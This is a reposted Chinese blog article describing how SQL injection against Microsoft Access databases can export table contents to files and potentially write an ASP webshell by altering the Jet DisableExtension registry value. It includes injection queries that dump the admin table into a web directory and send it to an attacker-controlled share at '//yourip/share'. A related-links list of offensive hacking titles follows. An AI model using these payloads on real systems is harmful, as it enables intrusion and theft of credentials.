当前位置: 首页 > news >正文

SQL注入Access导出WebShell

 

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txthtmhtml等格式)的方法:

 

SELECT * into [test.txt] in 'd:/web/' 'text;' from admin

 

执行上述语句,在d:/web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE/Software/Microsoft/Jet/4.0/Engines/Text/DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

这个方法跟那个调用AccessShell函数执行命令一样,要修改注册表,所以利用不是很大。

顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in '//yourip/share' 'text;' from admin

 

 

 

 

 

本文转载自lake2

 

相关文章:

  • Google SEO优化技术的12个要点总结
  • Oracle本地读写文件---Ora Write Webshell
  • CSS挂马代码的方法
  • ewebeditor 2.8 后台插马
  • 开启mysql root外连
  • Mysql暴错注入代码
  • PhpMyadmin最新拿WEBshell
  • arpsf 嗅探使用
  • 域渗透
  • 安全的使用带后门的webshell
  • oldjun 检测网站的经验
  • SQL注入eWebEditor数据库
  • serv-u8 本地提权
  • 很多黑阔的密码
  • 《SQL Server Online Manager》SQL Server 在线管理
  • [NodeJS] 关于Buffer
  • 《Java编程思想》读书笔记-对象导论
  • 【面试系列】之二:关于js原型
  • ECMAScript 6 学习之路 ( 四 ) String 字符串扩展
  • ES学习笔记(10)--ES6中的函数和数组补漏
  • Git 使用集
  • Python 使用 Tornado 框架实现 WebHook 自动部署 Git 项目
  • v-if和v-for连用出现的问题
  • Web Storage相关
  • WordPress 获取当前文章下的所有附件/获取指定ID文章的附件(图片、文件、视频)...
  • 从零到一:用Phaser.js写意地开发小游戏(Chapter 3 - 加载游戏资源)
  • 记录:CentOS7.2配置LNMP环境记录
  • 理解 C# 泛型接口中的协变与逆变(抗变)
  • 模型微调
  • 深入浏览器事件循环的本质
  • 首页查询功能的一次实现过程
  • 思维导图—你不知道的JavaScript中卷
  • d²y/dx²; 偏导数问题 请问f1 f2是什么意思
  • gunicorn工作原理
  • 基于django的视频点播网站开发-step3-注册登录功能 ...
  • 如何用纯 CSS 创作一个菱形 loader 动画
  • ​ssh免密码登录设置及问题总结
  • ​渐进式Web应用PWA的未来
  • ​人工智能书单(数学基础篇)
  • #《AI中文版》V3 第 1 章 概述
  • #Linux(Source Insight安装及工程建立)
  • (173)FPGA约束:单周期时序分析或默认时序分析
  • (3)(3.5) 遥测无线电区域条例
  • (cljs/run-at (JSVM. :browser) 搭建刚好可用的开发环境!)
  • (C语言)字符分类函数
  • (附源码)php投票系统 毕业设计 121500
  • (学习日记)2024.04.10:UCOSIII第三十八节:事件实验
  • (转)socket Aio demo
  • (转)大型网站架构演变和知识体系
  • ***linux下安装xampp,XAMPP目录结构(阿里云安装xampp)
  • .[backups@airmail.cc].faust勒索病毒的最新威胁:如何恢复您的数据?
  • .Net 6.0 处理跨域的方式
  • .NET 8 中引入新的 IHostedLifecycleService 接口 实现定时任务
  • .Net Framework 4.x 程序到底运行在哪个 CLR 版本之上
  • .NET/C# 利用 Walterlv.WeakEvents 高性能地定义和使用弱事件